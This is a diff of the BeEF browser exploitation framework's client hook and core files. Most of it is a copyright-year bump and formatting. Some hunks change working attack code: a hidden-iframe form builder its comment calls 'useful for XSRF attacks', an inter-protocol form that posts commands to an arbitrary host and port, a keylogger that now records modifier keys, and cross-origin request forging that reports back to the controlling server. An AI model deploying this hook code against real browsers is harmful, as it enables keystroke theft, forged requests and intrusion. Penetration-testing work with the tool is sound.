-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/dom.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -102,23 +102,19 @@ beef.dom = {
 	},
 	
 	/**
-     * Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted.
-     * example usage in the code: beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
+     * Create an iFrame element and prepend to document body. URI passed via 'src' property of function's 'params' parameter
+     * is assigned to created iframe tag's src attribute resulting in GET request to that URI.
+     * example usage in the code: beef.dom.createIframe('fullscreen', {'src':$j(this).attr('href')}, {}, null);
 	 * @param: {String} type: can be 'hidden' or 'fullScreen'. defaults to normal
-	 * @param: {String} method: can be 'GET' or 'POST'. defaults to GET
 	 * @param: {Hash} params: list of params that will be sent in request.
 	 * @param: {Hash} styles: css styling attributes, these are merged with the defaults specified in the type parameter
 	 * @param: {Function} a callback function to fire once the iFrame has loaded
 	 * @return: {Object} the inserted iFrame
+     *
 	 */
-	createIframe: function(type, method, params, styles, onload) {
+	createIframe: function(type, params, styles, onload) {
 		var css = {};
-		var form_submit = (method.toLowerCase() == 'post') ? true : false; 
-		if (form_submit && params['src'])
-		{
-			var form_action = params['src'];
-			params['src'] = '';
-		}
+
 		if (type == 'hidden') {
 			css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
 		} else if (type == 'fullscreen') {
@@ -130,13 +126,6 @@ beef.dom = {
 		}
 		var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
 		
-		if (form_submit && form_action)
-		{
-			var id = beef.dom.generateID();
-			$j(iframe).attr({'id': id, 'name':id});
-			var form = beef.dom.createForm({'action':form_action, 'method':'get', 'target':id}, false);
-			$j(form).prependTo('body').submit();
-		}
 		return iframe;
 	},
 
@@ -384,7 +373,8 @@ beef.dom = {
 
             if (codebase != null) {
                 content += "<param name='codebase' value='" + codebase + "' />"
-            }else{
+            }
+            if (archive != null){
                 content += "<param name='archive' value='" + archive + "' />";
             }
             if (params != null) {
@@ -445,15 +435,17 @@ beef.dom = {
      * Create an invisible iFrame with a form inside, and submit it. Useful for XSRF attacks delivered via POST requests.
      * @params: {String} action: the form action attribute, where the request will be sent.
      * @params: {String} method: HTTP method, usually POST.
+     * @params: {String} enctype: form encoding type
      * @params: {Array} inputs: an array of inputs to be added to the form (type, name, value).
      *         example: [{'type':'hidden', 'name':'1', 'value':''} , {'type':'hidden', 'name':'2', 'value':'3'}]
      */
-    createIframeXsrfForm: function(action, method, inputs){
+    createIframeXsrfForm: function(action, method, enctype, inputs){
         var iframeXsrf = beef.dom.createInvisibleIframe();
 
         var formXsrf = document.createElement('form');
-        formXsrf.setAttribute('action', action);
-        formXsrf.setAttribute('method', method);
+        formXsrf.setAttribute('action',  action);
+        formXsrf.setAttribute('method',  method);
+        formXsrf.setAttribute('enctype', enctype);
 
         var input = null;
         for (i in inputs){
@@ -476,11 +468,11 @@ beef.dom = {
      * @params: {String} rport: remote port
      * @params: {String} commands: protocol commands to be executed by the remote host:port service
      */
-    createIframeIpecForm: function(rhost, rport, commands){
+    createIframeIpecForm: function(rhost, rport, path, commands){
         var iframeIpec = beef.dom.createInvisibleIframe();
 
         var formIpec = document.createElement('form');
-        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+'/index.html');
+        formIpec.setAttribute('action',  'http://'+rhost+':'+rport+path);
         formIpec.setAttribute('method',  'POST');
         formIpec.setAttribute('enctype', 'multipart/form-data');
 

core/main/client/encode/base64.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/encode/json.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/geolocation.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/hardware.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/init.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/lib/evercookie.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/logger.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -43,6 +43,7 @@ beef.logger = {
         this.y = 0;
         this.target = null;
         this.data = null;
+        this.mods = null;
     },
 	
 	/**
@@ -233,17 +234,28 @@ beef.logger = {
 	 */
 	parse_stream: function() {
 		var s = '';
-		for (var i in this.stream)
-		{
-			//s += (this.stream[i]['modifiers']['alt']) ? '*alt* ' : '';
-			//s += (this.stream[i]['modifiers']['ctrl']) ? '*ctrl* ' : '';
-			//s += (this.stream[i]['modifiers']['shift']) ? 'Shift+' : '';
-			s += String.fromCharCode(this.stream[i]['char']);
+        var mods = '';
+		for (var i in this.stream){
+         try{
+            var mod = this.stream[i]['modifiers'];
+            s += String.fromCharCode(this.stream[i]['char']);
+            if(typeof mod != 'undefined' &&
+                      (mod['alt'] == true ||
+                      mod['ctrl'] == true ||
+                      mod['shift'] == true)){
+                mods += (mod['alt']) ? ' [Alt] ' : '';
+                mods += (mod['ctrl']) ? ' [Ctrl] ' : '';
+                mods += (mod['shift']) ? ' [Shift] ' : '';
+                mods += String.fromCharCode(this.stream[i]['char']);
+            }
+
+         }catch(e){}
 		}
         var k = new beef.logger.e();
         k.type = 'keys';
         k.target = beef.logger.get_dom_identifier();
         k.data = s;
+        k.mods = mods;
         return k;
 	},
 	

core/main/client/mitb.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -33,11 +33,11 @@ beef.mitb = {
 
                         //GET request
                         if (method == "GET") {
-                            //GET request -> cross-domain
+                            //GET request -> cross-origin
                             if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
                                 beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
                                 window.open(url);
-                            }else { //GET request -> same-domain
+                            }else { //GET request -> same-origin
                                 beef.mitb.sniff("GET [Ajax Request]: " + url);
                                 if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
                                     var title = "";
@@ -198,7 +198,7 @@ beef.mitb = {
             beef.mitb.sniff("GET: " + url);
 
         } catch (x) {
-            // the link is cross-domain, so load the resource in a different tab
+            // the link is cross-origin, so load the resource in a different tab
             window.open(url);
             beef.mitb.sniff("GET [New Window]: " + url);
         }

core/main/client/net.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -18,21 +18,21 @@
  */
 beef.net = {
 
-    host:"<%= @beef_host %>",
-    port:"<%= @beef_port %>",
-    hook:"<%= @beef_hook %>",
-    httpproto:"<%= @beef_proto %>",
-    handler:'/dh',
-    chop:500,
-    pad:30, //this is the amount of padding for extra params such as pc, pid and sid
-    sid_count:0,
-    cmd_queue:[],
+    host: "<%= @beef_host %>",
+    port: "<%= @beef_port %>",
+    hook: "<%= @beef_hook %>",
+    httpproto: "<%= @beef_proto %>",
+    handler: '/dh',
+    chop: 500,
+    pad: 30, //this is the amount of padding for extra params such as pc, pid and sid
+    sid_count: 0,
+    cmd_queue: [],
 
     /**
      * Command object. This represents the data to be sent back to BeEF,
      * using the beef.net.send() method.
      */
-    command:function () {
+    command: function () {
         this.cid = null;
         this.results = null;
         this.handler = null;
@@ -42,7 +42,7 @@ beef.net = {
     /**
      * Packet object. A single chunk of data. X packets -> 1 stream
      */
-    packet:function () {
+    packet: function () {
         this.id = null;
         this.data = null;
     },
@@ -50,7 +50,7 @@ beef.net = {
     /**
      * Stream object. Contains X packets, which are command result chunks.
      */
-    stream:function () {
+    stream: function () {
         this.id = null;
         this.packets = [];
         this.pc = 0;
@@ -58,8 +58,8 @@ beef.net = {
             return (this.url + this.handler + '?' + 'bh=' + beef.session.get_hook_session_id()).length;
         };
         this.get_packet_data = function () {
-             var p = this.packets.shift();
-             return {'bh':beef.session.get_hook_session_id(), 'sid':this.id, 'pid':p.id, 'pc':this.pc, 'd':p.data }
+            var p = this.packets.shift();
+            return {'bh': beef.session.get_hook_session_id(), 'sid': this.id, 'pid': p.id, 'pc': this.pc, 'd': p.data }
         };
     },
 
@@ -68,10 +68,10 @@ beef.net = {
      * NOTE: as we are using async mode, the response object will be empty if returned.
      * Using sync mode, request obj fields will be populated.
      */
-    response:function () {
+    response: function () {
         this.status_code = null;        // 500, 404, 200, 302
         this.status_text = null;        // success, timeout, error, ...
-        this.response_body = null;      // "<html>…." if not a cross domain request
+        this.response_body = null;      // "<html>…." if not a cross-origin request
         this.port_status = null;        // tcp port is open, closed or not http
         this.was_cross_domain = null;   // true or false
         this.was_timedout = null;       // the user specified timeout was reached
@@ -86,7 +86,7 @@ beef.net = {
      * @param: {String} results: the data to send
      * @param: {Function} callback: the function to call after execution
      */
-    queue:function (handler, cid, results, callback) {
+    queue: function (handler, cid, results, callback) {
         if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) {
             var s = new beef.net.command();
             s.cid = cid;
@@ -107,16 +107,16 @@ beef.net = {
      * @param: {String} results: the data to send
      * @param: {Function} callback: the function to call after execution
      */
-    send:function (handler, cid, results, callback) {
+    send: function (handler, cid, results, callback) {
         if (typeof beef.websocket === "undefined" || (handler === "/init" && cid == 0)) {
             this.queue(handler, cid, results, callback);
             this.flush();
-        }else {
+        } else {
             try {
                 beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
                     '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
                     '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
-            }catch (e) {
+            } catch (e) {
                 this.queue(handler, cid, results, callback);
                 this.flush();
             }
@@ -131,7 +131,7 @@ beef.net = {
      * XHR-polling mechanism. If WebSockets are used, the data is sent
      * back to BeEF straight away.
      */
-    flush:function () {
+    flush: function () {
         if (this.cmd_queue.length > 0) {
             var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue));
             this.cmd_queue.length = 0;
@@ -159,7 +159,7 @@ beef.net = {
      * @param: {String} str: the input data
      * @param: {Integer} amount: chunk length
      */
-    chunk:function (str, amount) {
+    chunk: function (str, amount) {
         if (typeof amount == 'undefined') n = 2;
         return str.match(RegExp('.{1,' + amount + '}', 'g'));
     },
@@ -169,7 +169,7 @@ beef.net = {
      * It uses beef.net.request to send back the data.
      * @param: {Object} stream: the stream object to be sent back.
      */
-    push:function (stream) {
+    push: function (stream) {
         //need to implement wait feature here eventually
         for (var i = 0; i < stream.pc; i++) {
             this.request(this.httpproto, 'GET', this.host, this.port, this.handler, null, stream.get_packet_data(), 10, 'text', null);
@@ -191,11 +191,11 @@ beef.net = {
      *
      * @return: {Object} response: this object contains the response details
      */
-    request:function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
+    request: function (scheme, method, domain, port, path, anchor, data, timeout, dataType, callback) {
         //check if same domain or cross domain
         var cross_domain = true;
-		if (document.domain == domain.replace(/(\r\n|\n|\r)/gm,"")) { //strip eventual line breaks
-            if(document.location.port == "" || document.location.port == null){
+        if (document.domain == domain.replace(/(\r\n|\n|\r)/gm, "")) { //strip eventual line breaks
+            if (document.location.port == "" || document.location.port == null) {
                 cross_domain = !(port == "80" || port == "443");
             }
         }
@@ -220,29 +220,29 @@ beef.net = {
          * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
          * This will turn POSTs into GETs for remote-domain requests.
          */
-        if (method == "POST"){
-           $j.ajaxSetup({
-              dataType: dataType
-           });
+        if (method == "POST") {
+            $j.ajaxSetup({
+                dataType: dataType
+            });
         } else {
-           $j.ajaxSetup({
+            $j.ajaxSetup({
                 dataType: 'script'
-           });
+            });
         }
 
         //build and execute the request
-        $j.ajax({type:method,
-            url:url,
-            data:data,
-            timeout:(timeout * 1000),
+        $j.ajax({type: method,
+            url: url,
+            data: data,
+            timeout: (timeout * 1000),
 
             //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
-            beforeSend:function (xhr) {
+            beforeSend: function (xhr) {
                 if (method == "POST") {
                     xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
                 }
             },
-            success:function (data, textStatus, xhr) {
+            success: function (data, textStatus, xhr) {
                 var end_time = new Date().getTime();
                 response.status_code = xhr.status;
                 response.status_text = textStatus;
@@ -251,14 +251,14 @@ beef.net = {
                 response.was_timedout = false;
                 response.duration = (end_time - start_time);
             },
-            error:function (jqXHR, textStatus, errorThrown) {
+            error: function (jqXHR, textStatus, errorThrown) {
                 var end_time = new Date().getTime();
                 response.response_body = jqXHR.responseText;
                 response.status_code = jqXHR.status;
                 response.status_text = textStatus;
                 response.duration = (end_time - start_time);
             },
-            complete:function (jqXHR, textStatus) {
+            complete: function (jqXHR, textStatus) {
                 response.status_code = jqXHR.status;
                 response.status_text = textStatus;
                 response.headers = jqXHR.getAllResponseHeaders();
@@ -288,19 +288,20 @@ beef.net = {
      *
      * forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
      */
-    forge_request:function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
+    forge_request: function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
 
         // check if same domain or cross domain
         var cross_domain = true;
-
-        if (document.domain == domain.replace(/(\r\n|\n|\r)/gm,"")) { //strip eventual line breaks
-           if(document.location.port == "" || document.location.port == null){
-               cross_domain = !(port == "80" || port == "443");
-           } else {
-              if (document.location.port == port) cross_domain = false;
-           }
+        if (domain == "undefined" || path == "undefined") {
+            return;
+        }
+        if (document.domain == domain.replace(/(\r\n|\n|\r)/gm, "")) { //strip eventual line breaks
+            if (document.location.port == "" || document.location.port == null) {
+                cross_domain = !(port == "80" || port == "443");
+            } else {
+                if (document.location.port == port) cross_domain = false;
+            }
         }
-
         // build the url
         var url = "";
         if (path.indexOf("http://") != -1 || path.indexOf("https://") != -1) {
@@ -333,7 +334,7 @@ beef.net = {
          * according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
          * This will turn POSTs into GETs for remote-domain requests.
          */
-        if (method == "POST"){
+        if (method == "POST") {
             $j.ajaxSetup({
                 dataType: dataType
             });
@@ -343,8 +344,8 @@ beef.net = {
             });
         }
 
-		// this is required for bugs in IE so data can be transferred back to the server
-        if ( beef.browser.isIE() ) {
+        // this is required for bugs in IE so data can be transferred back to the server
+        if (beef.browser.isIE()) {
             dataType = 'script'
         }
 
@@ -355,14 +356,14 @@ beef.net = {
             timeout: (timeout * 1000),
 
             //This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
-            beforeSend:function (xhr) {
+            beforeSend: function (xhr) {
                 if (method == "POST") {
                     xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
                 }
             },
 
             // http server responded successfully
-            success:function (data, textStatus, xhr) {
+            success: function (data, textStatus, xhr) {
                 var end_time = new Date().getTime();
                 response.status_code = xhr.status;
                 response.status_text = textStatus;
@@ -373,7 +374,7 @@ beef.net = {
 
             // server responded with a http error (403, 404, 500, etc)
             // or server is not a http server
-            error:function (xhr, textStatus, errorThrown) {
+            error: function (xhr, textStatus, errorThrown) {
                 var end_time = new Date().getTime();
                 response.response_body = xhr.responseText;
                 response.status_code = xhr.status;
@@ -381,33 +382,33 @@ beef.net = {
                 response.duration = (end_time - start_time);
             },
 
-            complete:function (xhr, textStatus) {
+            complete: function (xhr, textStatus) {
                 // cross-domain request
                 if (cross_domain) {
 
-					response.port_status = "crossdomain";
+                    response.port_status = "crossdomain";
 
                     if (xhr.status != 0) {
-						response.status_code = xhr.status;
-					} else {
-						response.status_code = -1;
-					}
+                        response.status_code = xhr.status;
+                    } else {
+                        response.status_code = -1;
+                    }
 
-					if (textStatus) {
-                    	response.status_text = textStatus;
-					} else {
-						response.status_text = "crossdomain";
-					}
+                    if (textStatus) {
+                        response.status_text = textStatus;
+                    } else {
+                        response.status_text = "crossdomain";
+                    }
 
-					if (xhr.getAllResponseHeaders()) {
-	                    response.headers = xhr.getAllResponseHeaders();
-					} else {
-						response.headers = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
-					}
+                    if (xhr.getAllResponseHeaders()) {
+                        response.headers = xhr.getAllResponseHeaders();
+                    } else {
+                        response.headers = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
+                    }
 
-					if (!response.response_body) {
-						response.response_body = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
-					}
+                    if (!response.response_body) {
+                        response.response_body = "ERROR: Cross Domain Request. The request was sent however it is impossible to view the response.\n";
+                    }
 
                 } else {
                     // same-domain request
@@ -420,8 +421,16 @@ beef.net = {
                         response.was_timedout = true;
                         response.response_body = "ERROR: Timed out\n";
                         response.port_status = "closed";
+                        /*
+                         * With IE we need to explicitly set the dataType to "script",
+                         * so there will be always parse-errors if the content is != javascript
+                         * */
                     } else if (textStatus == "parsererror") {
                         response.port_status = "not-http";
+                        if (beef.browser.isIE()) {
+                            response.status_text = "success";
+                            response.port_status = "open";
+                        }
                     } else {
                         response.port_status = "open";
                     }
@@ -434,7 +443,7 @@ beef.net = {
 
     //this is a stub, as associative arrays are not parsed by JSON, all key / value pairs should use new Object() or {}
     //http://andrewdupont.net/2006/05/18/javascript-associative-arrays-considered-harmful/
-    clean:function (r) {
+    clean: function (r) {
         if (this.array_has_string_key(r)) {
             var obj = {};
             for (var key in r)
@@ -445,7 +454,7 @@ beef.net = {
     },
 
     //Detects if an array has a string key
-    array_has_string_key:function (arr) {
+    array_has_string_key: function (arr) {
         if ($j.isArray(arr)) {
             try {
                 for (var key in arr)
@@ -459,7 +468,7 @@ beef.net = {
     /**
      * Sends back browser details to framework, calling beef.browser.getDetails()
      */
-    browser_details:function () {
+    browser_details: function () {
         var details = beef.browser.getDetails();
         details['HookSessionID'] = beef.session.get_hook_session_id();
         this.send('/init', 0, details);

core/main/client/net/cors.js

@@ -12,7 +12,7 @@ beef.net.cors = {
     },
 
     /**
-     * Make a cross-domain request using CORS
+     * Make a cross-origin request using CORS
      *
      * @param method {String} HTTP verb ('GET', 'POST', 'DELETE', etc.)
      * @param url {String} url

core/main/client/net/dns.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/net/local.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/net/portscanner.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/net/requester.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -19,8 +19,7 @@ beef.net.requester = {
 	handler: "requester",
 	
 	send: function(requests_array) {
-
-        for (i in requests_array) {
+        for(var i=0; i<requests_array.length; i++){
             request = requests_array[i];
 
             beef.net.forge_request('http', request.method, request.host, request.port, request.uri, null, request.headers, request.data, 10, null, request.allowCrossDomain, request.id,
@@ -32,8 +31,6 @@ beef.net.requester = {
                                            response_headers: res.headers});
                                        }
                                  );
-
-
         }
     }
 };

core/main/client/os.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -8,6 +8,24 @@ beef.os = {
 
 	ua: navigator.userAgent,
 
+	/**
+	  * Detect default browser (IE only)
+	  * Written by unsticky
+	  * http://ha.ckers.org/blog/20070319/detecting-default-browser-in-ie/
+	  */
+	getDefaultBrowser: function() {
+		var mt = document.mimeType;
+		var result = "Unknown"
+		if (mt) {
+			if (mt == "Safari Document")       result = "Safari";
+			if (mt == "Firefox HTML Document") result = "Firefox";
+			if (mt == "Chrome HTML Document")  result = "Chrome";
+			if (mt == "HTML Document")         result = "Internet Explorer";
+			if (mt == "Opera Web Document")    result = "Opera";
+		}
+		return result;
+	},
+
 	isWin311: function() {
 		return (this.ua.match('(Win16)')) ? true : false;
 	},

core/main/client/session.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //

core/main/client/timeout.js

@@ -1,12 +1,12 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
 
 /*
  Sometimes there are timing issues and looks like beef_init
- is not called at all (always in cross-domain situations,
+ is not called at all (always in cross-origin situations,
  for example calling the hook with jquery getScript,
  or sometimes with event handler injections).
 

core/main/client/updater.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -47,9 +47,8 @@ beef.updater = {
 				this.get_commands();    /*Polling*/
 			}
 		}
-
-      // ( typeof beef.websocket === "undefined")
-		setTimeout("beef.updater.check();", beef.updater.xhr_poll_timeout);
+        /* The following gives a stupid syntax error in IE, which can be ignored*/
+        setTimeout(function(){beef.updater.check()}, beef.updater.xhr_poll_timeout);
 	},
 	
     /**
@@ -81,6 +80,9 @@ beef.updater = {
 				command();
 			} catch(e) {
 				console.error('execute_commands - command failed to execute: ' + e.message);
+                // prints the command source to be executed, to better trace errors
+                // beef.client_debug must be enabled in the main config
+                beef.debug(command.toString());
 			}
 		}
 		this.lock = false;

core/main/client/websocket.js

@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -20,7 +20,7 @@ beef.websocket = {
 
     /**
      * Initialize the WebSocket client object.
-     * Note: use WebSocketSecure only if the hooked domain is under https.
+     * Note: use WebSocketSecure only if the hooked origin is under https.
      * Mixed-content in WS is quite different from a non-WS context.
      */
     init:function () {

core/main/command.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/configuration.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -22,14 +22,14 @@ module BeEF
       # @param [String] configuration_file Configuration file to be loaded, by default loads $root_dir/config.yaml
       def initialize(config)
         raise Exception::TypeError, '"config" needs to be a string' if not config.string?
-        raise Exception::TypeError, 'Configuration yaml cannot be found' if not File.exist?(config)
+        raise Exception::TypeError, "Configuration file '#{config}' cannot be found" if not File.exist?(config)
         begin
           #open base config
           @config = self.load(config)
           # set default value if key? does not exist
           @config.default = nil
           @@config = config
-        rescue Exception => e
+        rescue => e
           print_error "Fatal Error: cannot load configuration file"
           print_debug e
         end
@@ -44,7 +44,7 @@ module BeEF
           return nil if not File.exists?(file)
           raw = File.read(file)
           return YAML.load(raw)
-        rescue Exception => e
+        rescue => e
           print_debug "Unable to load '#{file}' #{e}"
           return nil
         end

core/main/console/banners.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -86,7 +86,7 @@ module Banners
         print_success "running on network interface: #{host}"
         beef_host = configuration.get("beef.http.public_port") || configuration.get("beef.http.port")
         data = "Hook URL: #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.hook_file")}\n"
-        data += "UI URL:   #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.panel_path")}\n"
+        data += "UI URL:   #{prototxt}://#{host}:#{configuration.get("beef.http.port")}#{configuration.get("beef.http.web_ui_basepath")}/panel\n"
         
         print_more data
       end

core/main/console/commandline.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

core/main/constants/browsers.rb

@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -7,75 +7,75 @@
 module BeEF
 module Core
 module Constants
-  
+
   module Browsers
 
-   	FF      = 'FF'       # Firefox
-   	M       = 'M'        # Mozila
-   	IE      = 'IE'       # Internet Explorer
-   	S       = 'S'        # Safari
-   	K       = 'K'        # Konqueror
-   	C       = 'C'        # Chrome
+    FF      = 'FF'       # Firefox
+    M       = 'M'        # Mozilla
+    IE      = 'IE'       # Internet Explorer
+    S       = 'S'        # Safari
+    K       = 'K'        # Konqueror
+    C       = 'C'        # Chrome
     O       = 'O'        # Opera
-   	ALL     = 'ALL'      # ALL
-   	UNKNOWN = 'UN'       # Unknown
-	
-   	FRIENDLY_FF_NAME  = 'Firefox' 
-   	FRIENDLY_M_NAME   = 'Mozila'
-   	FRIENDLY_IE_NAME  = 'Internet Explorer'
-   	FRIENDLY_S_NAME   = 'Safari'
-   	FRIENDLY_K_NAME   = 'Konqueror'
-   	FRIENDLY_C_NAME   = 'Chrome'
+    ALL     = 'ALL'      # ALL
+    UNKNOWN = 'UN'       # Unknown
+
+    FRIENDLY_FF_NAME  = 'Firefox'
+    FRIENDLY_M_NAME   = 'Mozilla'
+    FRIENDLY_IE_NAME  = 'Internet Explorer'
+    FRIENDLY_S_NAME   = 'Safari'
+    FRIENDLY_K_NAME   = 'Konqueror'
+    FRIENDLY_C_NAME   = 'Chrome'
     FRIENDLY_O_NAME   = 'Opera'
